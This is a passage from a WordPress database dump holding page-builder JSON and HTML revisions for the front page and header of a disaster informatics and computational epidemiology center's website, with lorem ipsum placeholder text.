aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',168,'https://gsudice.dataconn.net/?p=322',0,'revision','',0),(323,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',20,'https://gsudice.dataconn.net/?p=323',0,'revision','',0),(324,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',23,'https://gsudice.dataconn.net/?p=324',0,'revision','',0),(325,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer 